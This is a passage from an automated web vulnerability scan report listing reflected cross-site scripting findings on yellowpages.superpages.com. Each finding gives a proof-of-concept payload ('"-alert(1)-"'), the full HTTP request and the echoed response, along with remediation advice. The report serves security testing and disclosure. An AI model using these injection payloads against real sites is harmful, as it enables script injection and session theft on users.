Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/iepopup.js57121"-alert(1)-"a019059d18b?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.603. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-1.4.2.min.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12235"-alert(1)-"2aa4880554e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common12235"-alert(1)-"2aa4880554e/js/jquery-1.4.2.min.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common12235&quot;-alert(1)-&quot;2aa4880554e/js/jquery-1.4.2.min.js
Server: Unspecified
Set-Cookie: JSESSIONID=199509FE8D2800AF9160EA7047F290DD; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:44 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common12235"-alert(1)-"2aa4880554e/js/jquery-1.4.2.min.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.604. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-1.4.2.min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e853"-alert(1)-"4df34621227 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js6e853"-alert(1)-"4df34621227/jquery-1.4.2.min.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js6e853&quot;-alert(1)-&quot;4df34621227/jquery-1.4.2.min.js
Server: Unspecified
Set-Cookie: JSESSIONID=3139A329C5301E9058E04DFF871BCCF1; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:00 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js6e853"-alert(1)-"4df34621227/jquery-1.4.2.min.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.605. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-1.4.2.min.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c940"-alert(1)-"8d600cbb5e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/jquery-1.4.2.min.js4c940"-alert(1)-"8d600cbb5e6 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/jquery-1.4.2.min.js4c940&quot;-alert(1)-&quot;8d600cbb5e6
Server: Unspecified
Set-Cookie: JSESSIONID=1640D122FA5011C752860F98D405C757; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:08 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
es.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js4c940"-alert(1)-"8d600cbb5e6?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.606. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-plugins.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4138"-alert(1)-"d392b5225e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commonf4138"-alert(1)-"d392b5225e3/js/jquery-plugins.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commonf4138&quot;-alert(1)-&quot;d392b5225e3/js/jquery-plugins.js
Server: Unspecified
Set-Cookie: JSESSIONID=9572D1720D04456BA7DF5D05EB1798D8; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:40 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commonf4138"-alert(1)-"d392b5225e3/js/jquery-plugins.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.607. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-plugins.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc582"-alert(1)-"51b3ea3bf60 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/jsdc582"-alert(1)-"51b3ea3bf60/jquery-plugins.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/jsdc582&quot;-alert(1)-&quot;51b3ea3bf60/jquery-plugins.js
Server: Unspecified
Set-Cookie: JSESSIONID=09CE7FF4251840525CF01CD53A9C9A17; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:59 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/jsdc582"-alert(1)-"51b3ea3bf60/jquery-plugins.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.608. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-plugins.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce99"-alert(1)-"1f8bcc299d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/jquery-plugins.jsfce99"-alert(1)-"1f8bcc299d1 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/jquery-plugins.jsfce99&quot;-alert(1)-&quot;1f8bcc299d1
Server: Unspecified
Set-Cookie: JSESSIONID=D2531DC67D815FBBB68818C02A80D6CB; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:07 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
ages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/jquery-plugins.jsfce99"-alert(1)-"1f8bcc299d1?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.609. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.history_remote.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39dde"-alert(1)-"ad48974274b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common39dde"-alert(1)-"ad48974274b/js/jquery.history_remote.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common39dde&quot;-alert(1)-&quot;ad48974274b/js/jquery.history_remote.js
Server: Unspecified
Set-Cookie: JSESSIONID=C15B868960CE2EE9AF292572256EADF3; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:02 GMT
Cache-Control: private
Content-Length: 36107


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common39dde"-alert(1)-"ad48974274b/js/jquery.history_remote.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.610. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.history_remote.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c965f"-alert(1)-"9b53f386972 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/jsc965f"-alert(1)-"9b53f386972/jquery.history_remote.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/jsc965f&quot;-alert(1)-&quot;9b53f386972/jquery.history_remote.js
Server: Unspecified
Set-Cookie: JSESSIONID=6AA4650E7009D0260F993E6AB745753B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:22 GMT
Cache-Control: private
Content-Length: 36107


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/jsc965f"-alert(1)-"9b53f386972/jquery.history_remote.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.611. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.history_remote.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfa09"-alert(1)-"556c143ae67 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/jquery.history_remote.jsdfa09"-alert(1)-"556c143ae67 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/jquery.history_remote.jsdfa09&quot;-alert(1)-&quot;556c143ae67
Server: Unspecified
Set-Cookie: JSESSIONID=AC0419B6F8814437382178A41C7FB943; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:30 GMT
Cache-Control: private
Content-Length: 36107


                       <!--
       
       -->


                                   
...[SNIP]...
perpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/jquery.history_remote.jsdfa09"-alert(1)-"556c143ae67?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.612. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.sptabs.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7dc5"-alert(1)-"f36372d39f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commond7dc5"-alert(1)-"f36372d39f5/js/jquery.sptabs.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commond7dc5&quot;-alert(1)-&quot;f36372d39f5/js/jquery.sptabs.js
Server: Unspecified
Set-Cookie: JSESSIONID=7F42488F4AB9870477CB7A261876420D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:24 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commond7dc5"-alert(1)-"f36372d39f5/js/jquery.sptabs.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.613. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.sptabs.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c12c"-alert(1)-"1659686fb48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js2c12c"-alert(1)-"1659686fb48/jquery.sptabs.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js2c12c&quot;-alert(1)-&quot;1659686fb48/jquery.sptabs.js
Server: Unspecified
Set-Cookie: JSESSIONID=560FCD4338D535363C1D59CFD5091B2B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:32 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js2c12c"-alert(1)-"1659686fb48/jquery.sptabs.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.614. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.sptabs.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc50d"-alert(1)-"069a0f815e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/jquery.sptabs.jsfc50d"-alert(1)-"069a0f815e6 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/jquery.sptabs.jsfc50d&quot;-alert(1)-&quot;069a0f815e6
Server: Unspecified
Set-Cookie: JSESSIONID=96C846039494DE3D303C28223283100E; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:46 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
pages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/jquery.sptabs.jsfc50d"-alert(1)-"069a0f815e6?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.615. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/omniture_onclick.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a2a7"-alert(1)-"fc51b2a718c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common9a2a7"-alert(1)-"fc51b2a718c/js/omniture_onclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common9a2a7&quot;-alert(1)-&quot;fc51b2a718c/js/omniture_onclick.js
Server: Unspecified
Set-Cookie: JSESSIONID=76DD5A47FC1A71E27DFC56B0F9C6C5FD; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:30 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common9a2a7"-alert(1)-"fc51b2a718c/js/omniture_onclick.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.616. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/omniture_onclick.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48ee7"-alert(1)-"7ec2f5075e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js48ee7"-alert(1)-"7ec2f5075e8/omniture_onclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js48ee7&quot;-alert(1)-&quot;7ec2f5075e8/omniture_onclick.js
Server: Unspecified
Set-Cookie: JSESSIONID=380CEA149465E878E1853CBE21E66C4D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:37 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js48ee7"-alert(1)-"7ec2f5075e8/omniture_onclick.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

